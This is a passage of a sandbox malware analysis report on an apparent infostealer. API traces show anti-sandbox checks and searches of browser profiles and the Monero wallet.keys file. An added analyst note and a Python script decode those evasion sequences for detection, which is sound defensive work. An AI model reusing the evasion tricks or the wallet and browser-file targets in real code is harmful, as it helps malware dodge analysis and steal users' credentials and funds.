                                 • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocFree
                                • String ID:
                                • API String ID: 2087232378-0
                                • Opcode ID: 99aaf11bcbaee74b7d35cafa34d7148dbb3c06573ff6c104f4c1aa503d3ad835
                                • Instruction ID: 0845f81a4345e43988eb574b95654d618ab7d9c4dfeab86c12cde628f049be40
                                • Opcode Fuzzy Hash: 99aaf11bcbaee74b7d35cafa34d7148dbb3c06573ff6c104f4c1aa503d3ad835
                                • Instruction Fuzzy Hash: 10F0E271641208BBE7149AA8AC4AFBFB7E8E705B15F304848F644E3290D9759E00CAA8
                                APIs
                                  • Part of subcall function 005078E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00507910
                                  • Part of subcall function 005078E0: RtlAllocateHeap.NTDLL(00000000), ref: 00507917
                                  • Part of subcall function 005078E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0050792F
                                  • Part of subcall function 00507850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004F11B7), ref: 00507880
                                  • Part of subcall function 00507850: RtlAllocateHeap.NTDLL(00000000), ref: 00507887
                                  • Part of subcall function 00507850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0050789F
                                • ExitProcess.KERNEL32 ref: 004F11C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                 • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AllocateName$ComputerExitUser
                                • String ID:
                                • API String ID: 3550813701-0
                                • Opcode ID: 05ea10f8852d8ba502a0e54dd223e57937f7f202664bd78661c07945f74cda38
                                • Instruction ID: cfc47c290a32e07ec84c3556944305ff141c33c9539b792bb08ea3a91bfb957c
                                • Opcode Fuzzy Hash: 05ea10f8852d8ba502a0e54dd223e57937f7f202664bd78661c07945f74cda38
                                • Instruction Fuzzy Hash: 2CE0ECA5A1420AA2DA1077B0AD0FB3E3A9C6B58346F044425BA4592692FA29F810856E
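Analyst note on the three functions above (call sites 004F10B3, 004F112B and 004F11C6), followed by an added triage script that is not part of the Joe Sandbox report or of the analysed sample. Decoding the recorded arguments: VirtualAlloc(NULL, 0x17C841C0, 0x3000, 0x4) asks for exactly 399,000,000 bytes with MEM_COMMIT|MEM_RESERVE and PAGE_READWRITE, and the same size is released straight away by VirtualFree(..., 0x8000 = MEM_RELEASE); an allocate-and-free of roughly 400 MB with nothing written to it is a common probe for analysis VMs that run with little RAM. The stack values on the GetCurrentProcess line (0, 0x7D0, 0x3000, 0x40, 0) appear to be the arguments already pushed for the VirtualAllocExNuma call that follows (2000 bytes, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE, NUMA node 0); that reading is an assumption, but the adjacent ExitProcess is consistent with the process quitting when that call fails, a known check against emulators that do not implement the NUMA API. The third function collects the computer name and the user name through its two subcalls and then reaches ExitProcess, consistent with a block-list comparison of sandbox host and user names. The script below parses report lines of this shape and flags these three sequences; its regex, the Call and Finding records, the 256 MiB threshold and the pattern names are the example's own assumptions, and the sample input is constructed by copying the API lines above.

```python
"""Added triage helper: parse Joe Sandbox 'APIs' lines and flag anti-analysis sequences.
Example code, not part of the report or of the sample; the line regex, the Call/Finding
records, the 256 MiB threshold and the pattern names are this example's assumptions."""
from __future__ import annotations
import re
from dataclasses import dataclass

# Constructed input: the API lines of the three function blocks above, copied verbatim.
SAMPLE_REPORT = """\
• VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 004F10B3
• VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 004F10F7
• GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 004F112B
• VirtualAllocExNuma.KERNEL32(00000000), ref: 004F1132
• ExitProcess.KERNEL32 ref: 004F1143
  • Part of subcall function 005078E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0050792F
  • Part of subcall function 00507850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0050789F
• ExitProcess.KERNEL32 ref: 004F11C6
"""

# One line: optional "Part of subcall function XXXX:" prefix, Api.MODULE, an optional
# "(arg,arg,...)" list, then "ref: <call-site address>".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
# Documented Win32 constants used to decode the recorded arguments.
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
LARGE_ALLOC_BYTES = 256 * 1024 * 1024  # assumed threshold for a RAM-size probe


@dataclass
class Call:
    api: str
    module: str
    args: list[str]  # raw hex strings as printed; '?' means the value was not resolved
    ref: int         # call-site virtual address


@dataclass
class Finding:
    ref: int
    pattern: str
    detail: str


def hexval(arg: str) -> int | None:
    """Report argument -> int, or None for an unresolved '?'."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def describe_flags(value: int | None) -> str:
    """Render a MEM_* bit mask by name, e.g. 0x3000 -> MEM_COMMIT|MEM_RESERVE."""
    if value is None:
        return "?"
    names = [name for bit, name in MEM_FLAGS.items() if value & bit]
    return "|".join(names) if names else hex(value)


def parse_calls(report_text: str) -> list[Call]:
    calls = []
    for line in report_text.splitlines():
        m = CALL_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            calls.append(Call(m["api"], m["module"], args, int(m["ref"], 16)))
    return calls


def find_evasion_patterns(calls: list[Call]) -> list[Finding]:
    findings: list[Finding] = []
    for i, c in enumerate(calls):
        window = calls[i + 1:i + 3]  # the next two calls in the listing
        exits = [x for x in window if x.api == "ExitProcess"]

        # 1. Very large VirtualAlloc, released again right away: RAM-size probe.
        if c.api == "VirtualAlloc" and len(c.args) >= 4:
            size = hexval(c.args[1])
            freed = any(x.api == "VirtualFree" and x.args[1:2] == c.args[1:2] for x in window)
            if size is not None and size >= LARGE_ALLOC_BYTES:
                findings.append(Finding(c.ref, "large_alloc_probe",
                    f"VirtualAlloc {size:,} bytes ({describe_flags(hexval(c.args[2]))}, "
                    f"{PAGE_PROTECT.get(hexval(c.args[3]), '?')}), freed={freed}"))

        # 2. VirtualAllocExNuma followed by ExitProcess.  Assumption: the stack values
        #    on the preceding GetCurrentProcess line are this call's pushed arguments.
        if c.api == "VirtualAllocExNuma" and exits:
            prev = calls[i - 1] if i else None
            detail = "arguments not recorded"
            if prev and prev.api == "GetCurrentProcess" and len(prev.args) == 5:
                size, flags, prot, node = (hexval(a) for a in prev.args[1:5])
                detail = (f"size={size} {describe_flags(flags)} "
                          f"{PAGE_PROTECT.get(prot, '?')} numa_node={node}")
            findings.append(Finding(c.ref, "numa_alloc_probe", detail + "; ExitProcess on failure"))

        # 3. Computer name and user name collected, then ExitProcess: block-list gate.
        if c.api in ("GetComputerNameA", "GetUserNameA") and exits and not any(
                f.pattern == "hostname_username_gate" and f.ref == exits[0].ref for f in findings):
            findings.append(Finding(exits[0].ref, "hostname_username_gate",
                                    "host/user name compared before continuing"))
    return findings


if __name__ == "__main__":
    for f in find_evasion_patterns(parse_calls(SAMPLE_REPORT)):
        print(f"{f.ref:08X}  {f.pattern:24s} {f.detail}")
```

Run it as a script to print one line per finding; on the constructed input it reports the 399,000,000-byte allocation at 004F10B3 (freed=True), the NUMA probe at 004F1132 with the decoded size and protection, and the name gate that ends at 004F11C6. The two-call window is deliberately narrow so that an ExitProcess further away, which may be ordinary error handling, is not counted.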
                                APIs
                                • wsprintfA.USER32 ref: 005038CC
                                • FindFirstFileA.KERNEL32(?,?), ref: 005038E3
                                • lstrcat.KERNEL32(?,?), ref: 00503935
                                • StrCmpCA.SHLWAPI(?,00510F70), ref: 00503947
                                • StrCmpCA.SHLWAPI(?,00510F74), ref: 0050395D
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00503C67
                                • FindClose.KERNEL32(000000FF), ref: 00503C7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                 • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 1125553467-2524465048
                                • Opcode ID: 11afeeecea4bfc99156dfa10e3111d417d182b4e339349a9ea4a0e3312724df1
                                • Instruction ID: 9ce3dc138ad4449ecd33148eae2f0fd9c075ddab1278d92a2b53013f054119f8
                                • Opcode Fuzzy Hash: 11afeeecea4bfc99156dfa10e3111d417d182b4e339349a9ea4a0e3312724df1
                                • Instruction Fuzzy Hash: 3AA143B1A00209ABDB24DF64DC8AFFE777CBF44301F048588A54D96181EB759B84CF52
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                • FindFirstFileA.KERNEL32(00000000,?,00510B32,00510B2B,00000000,?,?,?,005113F4,00510B2A), ref: 004FBEF5
                                • StrCmpCA.SHLWAPI(?,005113F8), ref: 004FBF4D
                                • StrCmpCA.SHLWAPI(?,005113FC), ref: 004FBF63
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 004FC7BF
                                • FindClose.KERNEL32(000000FF), ref: 004FC7D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                 • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 3334442632-726946144
                                • Opcode ID: 55e8b20e3d21527764d504388fe8240b4d93da4880d18614fa24a436d616276a
                                • Instruction ID: a7de55e3f96f895bdc079da2c87678376fb9cb1cc397c4e742ea438fd2240f56
                                • Opcode Fuzzy Hash: 55e8b20e3d21527764d504388fe8240b4d93da4880d18614fa24a436d616276a
                                • Instruction Fuzzy Hash: 37427472910209ABDB14FB70DD9AEEE777CBFD4300F408558B906961C1EE34AB49CB96
                                APIs
                                • wsprintfA.USER32 ref: 0050492C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00504943
                                • StrCmpCA.SHLWAPI(?,00510FDC), ref: 00504971
                                • StrCmpCA.SHLWAPI(?,00510FE0), ref: 00504987
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00504B7D
                                • FindClose.KERNEL32(000000FF), ref: 00504B92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                 • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s$%s\%s$%s\*
                                • API String ID: 180737720-445461498
                                • Opcode ID: bb8d65720049f08d1ad90b1fdd0cb75eb51d9a0c640f60294e63b7fe39caaf1d
                                • Instruction ID: 6b0de390a4307585a74a6bb9fbefb63d54dd8abe6ac10f9d1dd31a2b4ea3367a
                                • Opcode Fuzzy Hash: bb8d65720049f08d1ad90b1fdd0cb75eb51d9a0c640f60294e63b7fe39caaf1d
                                • Instruction Fuzzy Hash: 9F6178B1500219BBDB20EBA0DC4AFEE777CBB48701F04859CB64996180EB75EB85CF95
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00504580
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00504587
                                • wsprintfA.USER32 ref: 005045A6
                                • FindFirstFileA.KERNEL32(?,?), ref: 005045BD
                                • StrCmpCA.SHLWAPI(?,00510FC4), ref: 005045EB
                                • StrCmpCA.SHLWAPI(?,00510FC8), ref: 00504601
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0050468B
                                • FindClose.KERNEL32(000000FF), ref: 005046A0
                                • lstrcat.KERNEL32(?,012DE320), ref: 005046C5
                                • lstrcat.KERNEL32(?,012DD778), ref: 005046D8
                                • lstrlen.KERNEL32(?), ref: 005046E5
                                • lstrlen.KERNEL32(?), ref: 005046F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                 • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                • String ID: %s\%s$%s\*
                                • API String ID: 671575355-2848263008
                                • Opcode ID: a76e69ae162708172d456cbaa1bcc117625352ee0f62b5aa52de7a2cc5b2cb86
                                • Instruction ID: 4562a6b9e38c24f0da68734f845df47d0c83fcaa180f8a99f3f39394373d8b52
                                • Opcode Fuzzy Hash: a76e69ae162708172d456cbaa1bcc117625352ee0f62b5aa52de7a2cc5b2cb86
                                • Instruction Fuzzy Hash: 715167B1500218ABDB20EB70DC8AFEE777CBB58301F408588F64992190EB79DB85CF95
                                APIs
                                • wsprintfA.USER32 ref: 00503EC3
                                • FindFirstFileA.KERNEL32(?,?), ref: 00503EDA
                                • StrCmpCA.SHLWAPI(?,00510FAC), ref: 00503F08
                                • StrCmpCA.SHLWAPI(?,00510FB0), ref: 00503F1E
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0050406C
                                • FindClose.KERNEL32(000000FF), ref: 00504081
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                 • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 180737720-4073750446
                                • Opcode ID: d4bc4824676e8357b42a18afb8254189f19271a53ec07198c5440c130a8f4ea0
                                • Instruction ID: 903e7103fa2bab7c10fcfe81752eaf087825e92b6e0b0351b05637dd5a0d1406
                                • Opcode Fuzzy Hash: d4bc4824676e8357b42a18afb8254189f19271a53ec07198c5440c130a8f4ea0
                                • Instruction Fuzzy Hash: E65146B1900219BBDB24FBB0DC8AEFE777CBB44301F408588B69996080DB75DB858F55
                                APIs
                                • wsprintfA.USER32 ref: 004FED3E
                                • FindFirstFileA.KERNEL32(?,?), ref: 004FED55
                                • StrCmpCA.SHLWAPI(?,00511538), ref: 004FEDAB
                                • StrCmpCA.SHLWAPI(?,0051153C), ref: 004FEDC1
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 004FF2AE
                                • FindClose.KERNEL32(000000FF), ref: 004FF2C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 180737720-1013718255
                                • Opcode ID: 381f5f73c9f24d0a9ba9565a22093008529cbb21302132b31fc67b80271315a2
                                • Instruction ID: aafc1441c63108a68d04bb386faacd5c25d59beb792e066932fdfca404eab2ca
                                • Opcode Fuzzy Hash: 381f5f73c9f24d0a9ba9565a22093008529cbb21302132b31fc67b80271315a2
                                • Instruction Fuzzy Hash: 60E112729112199AEB54FB60CC56EEE7738BF94300F4085D9B50A620D2EF346F8ACF56
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005115B8,00510D96), ref: 004FF71E
                                • StrCmpCA.SHLWAPI(?,005115BC), ref: 004FF76F
                                • StrCmpCA.SHLWAPI(?,005115C0), ref: 004FF785
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 004FFAB1
                                • FindClose.KERNEL32(000000FF), ref: 004FFAC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: prefs.js
                                • API String ID: 3334442632-3783873740
                                • Opcode ID: df25f514ca1a8bf509a2ea51fc6a7fe55e8639862b2e8e7b65f21a7d514493b9
                                • Instruction ID: f25a41523823b3ffc0f37b196ba5096515f13794b339f92c80d8662bacf06f56
                                • Opcode Fuzzy Hash: df25f514ca1a8bf509a2ea51fc6a7fe55e8639862b2e8e7b65f21a7d514493b9
                                • Instruction Fuzzy Hash: 57B180719002099BDB24FF60DC9AFEE7779BF94300F0085A9A50A961C1EF346B49CF96
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0051510C,?,?,?,005151B4,?,?,00000000,?,00000000), ref: 004F1923
                                • StrCmpCA.SHLWAPI(?,0051525C), ref: 004F1973
                                • StrCmpCA.SHLWAPI(?,00515304), ref: 004F1989
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004F1D40
                                • DeleteFileA.KERNEL32(00000000), ref: 004F1DCA
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 004F1E20
                                • FindClose.KERNEL32(000000FF), ref: 004F1E32
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
